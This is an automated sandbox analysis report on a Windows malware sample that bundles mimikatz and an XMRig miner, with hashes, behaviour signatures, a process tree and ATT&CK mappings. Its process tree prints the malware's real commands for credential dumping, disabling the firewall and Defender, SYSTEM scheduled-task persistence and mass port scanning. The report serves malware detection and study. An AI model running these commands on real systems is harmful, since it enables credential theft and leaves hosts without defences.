Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
29-09-2024 09:37
General
-
Target
2024-09-29_55f2ca57de6f4c47b28ae77d12e2ad7e_hacktools_icedid_mimikatz.exe
-
Size
8.5MB
-
MD5
55f2ca57de6f4c47b28ae77d12e2ad7e
-
SHA1
16ce5729723b1d119c57683542ce8618f6c2011e
-
SHA256
4e774025f2e398dded47c41b95a8366d2c395211443c475c614c478a3cf8cfd3
-
SHA512
d6f51dbef5ba0abb37035668bf4f6c106ed988ee026087dc457c4831c4c5fefa0230d0814956c5113f825ea1b705d8c743a0a02717704618f66edc1439500b0e
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (19650) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 28 IoCs
-
Loads dropped DLL 12 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
UPX packed file 35 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\hyzeqbqqb\gztlyb.exe"C:\Windows\TEMP\hyzeqbqqb\gztlyb.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-09-29_55f2ca57de6f4c47b28ae77d12e2ad7e_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-29_55f2ca57de6f4c47b28ae77d12e2ad7e_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ttzhywya\ubezybb.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\ttzhywya\ubezybb.exeC:\Windows\ttzhywya\ubezybb.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3932,i,4356837537417149674,16553092232944545509,262144 --variations-seed-version --mojo-platform-channel-handle=4100 /prefetch:81⤵
-
C:\Windows\ttzhywya\ubezybb.exeC:\Windows\ttzhywya\ubezybb.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\wezfuauac\sblagaaba\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\wezfuauac\sblagaaba\wpcap.exeC:\Windows\wezfuauac\sblagaaba\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\wezfuauac\sblagaaba\geypuubqa.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\wezfuauac\sblagaaba\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\wezfuauac\sblagaaba\geypuubqa.exeC:\Windows\wezfuauac\sblagaaba\geypuubqa.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\wezfuauac\sblagaaba\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\wezfuauac\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\wezfuauac\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\wezfuauac\Corporate\vfshost.exeC:\Windows\wezfuauac\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gtzhlygqz" /ru system /tr "cmd /c C:\Windows\ime\ubezybb.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "gtzhlygqz" /ru system /tr "cmd /c C:\Windows\ime\ubezybb.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ywazsfbbl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ttzhywya\ubezybb.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ywazsfbbl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ttzhywya\ubezybb.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bebunzncg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\hyzeqbqqb\gztlyb.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bebunzncg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\hyzeqbqqb\gztlyb.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 812 C:\Windows\TEMP\wezfuauac\812.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 376 C:\Windows\TEMP\wezfuauac\376.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 2140 C:\Windows\TEMP\wezfuauac\2140.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 2752 C:\Windows\TEMP\wezfuauac\2752.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 2968 C:\Windows\TEMP\wezfuauac\2968.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 2256 C:\Windows\TEMP\wezfuauac\2256.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 2944 C:\Windows\TEMP\wezfuauac\2944.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 3724 C:\Windows\TEMP\wezfuauac\3724.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 3820 C:\Windows\TEMP\wezfuauac\3820.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 3884 C:\Windows\TEMP\wezfuauac\3884.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 3976 C:\Windows\TEMP\wezfuauac\3976.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 2664 C:\Windows\TEMP\wezfuauac\2664.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 3736 C:\Windows\TEMP\wezfuauac\3736.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 2860 C:\Windows\TEMP\wezfuauac\2860.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 4560 C:\Windows\TEMP\wezfuauac\4560.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 4708 C:\Windows\TEMP\wezfuauac\4708.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 1604 C:\Windows\TEMP\wezfuauac\1604.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\wezfuauac\qletbebsb.exeC:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 3796 C:\Windows\TEMP\wezfuauac\3796.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\wezfuauac\sblagaaba\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\wezfuauac\sblagaaba\yqhqaznuh.exeyqhqaznuh.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\umuemy.exeC:\Windows\SysWOW64\umuemy.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\hyzeqbqqb\gztlyb.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\hyzeqbqqb\gztlyb.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\ubezybb.exe1⤵
-
C:\Windows\ime\ubezybb.exeC:\Windows\ime\ubezybb.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ttzhywya\ubezybb.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\ttzhywya\ubezybb.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
4.1MB
MD5775bf3b22058f44d3e3eb1a21ed22df0
SHA16daa8285c209b6f3c594fbefadea2a59e805e70f
SHA256120bc1f0b32e87959879a0203c2cebd3771d4d49b270dd29594a9384bd7067e7
SHA512a586e3afdf941ddfef9ad56354e5c6c7c1639eb5d8c60255cb90d404380b84bd985e9253d48345492ee37c08c89f3986da09c8d77f99a3c7b6153f21a3f4cd7d
-
Filesize
3.0MB
MD5b2a62b7bca5eaace62164da83a0e5d2e
SHA1f17e1ed74b6e53675b832e9fd952fe3ecc942c31
SHA256ec81b47a9ee9edc929cb75e2ee4765bc5e5d683f8489d5491ed5b53a92001927
SHA512d721fc39b0c88c650d16470d4380e2cc47cfa7cedc0e268c5fb4ef070fb27e4187f4a3f222ba1254fa37680fc76e217284897968e60e556148b8be8ba1ab50ac
-
Filesize
26.5MB
MD58ebe7664649e0857d7c4580a8d8560d2
SHA10629511fae14bd04f6066ca06b82dc7b0b3bd642
SHA256b72ee12b448e5767981026a896e557aeacb68346e6fefda430e2b5954e98eb3a
SHA5129f6426a6054bd7a996428562214fe47c108f122cbdf875b85b1e0ac6d78717cfaa26b9e8463f7264793e73d3ad761c6233eb2aa3c21883ca0498ba0b8821c586
-
Filesize
7.6MB
MD5f975ec0b48fe652084db9916cf10d8df
SHA17e4feea921b44cd0ff34b65876ef24972e3c78dc
SHA256b701c460adffc8e87aaeba4a980c8a3974c78bb0c95eaf8c76dd6c231e787b15
SHA51289321fef433513683d44abfbf5d67ed621a00422a099466160800eb06377368fc6899a07b0f1437eb7b913139b9e046d3942c2002296220909619974cfaa5518
-
Filesize
8.9MB
MD5902e8dac67716773a9cedf5843287890
SHA1d06545a9e1e0429b609a6a4392269513c8415749
SHA25632123bddd4f2dd629875a8a968cedb53c5e8895165924277b3cc16c2f4ebfef0
